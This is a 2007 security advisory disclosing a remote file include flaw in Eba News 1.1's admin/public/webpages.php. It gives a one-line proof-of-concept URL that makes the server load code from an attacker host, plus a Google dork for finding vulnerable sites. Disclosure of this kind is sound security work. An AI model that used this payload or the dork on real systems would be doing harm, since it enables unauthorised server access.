Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org

--------------------------------------------------
Eba News Version : v1.1 <= (webpages.php) Remote File Include
--------------------------------------------------

Author : SekoMirza
Date Found : Nisan 11 2007
Location : Fransa // ...
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Eba News
version : 1.1
vendor : http://ebascripts.com/
source url : http://ebascripts.com/
--------------------------------------------------

Description:
~~~~~~~~

EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.



--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in admin/public/webpages.php


Proof Of Concept:
~~~~~~~~~~~~

eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?

--------------------------------------------------

google d0rk:
~~~~~~~
"Eba News"

--------------------------------------------------
Solution:
~~~
- download new version in vendor URL

--------------------------------------------------
Shoutz:
~~
~ My Sweet -> Caramel
~ For Mp3s -> Hypn0sis
~ For Support -> www.starhack.org
~ My Bro -> PhantomOrchid
~ My Preceptor -> Earnk Kazno


--------------------------------------------------

Contact:
~~~

Seko[at]se-ko[dot]info

-------------------------------- [ EOF ]----------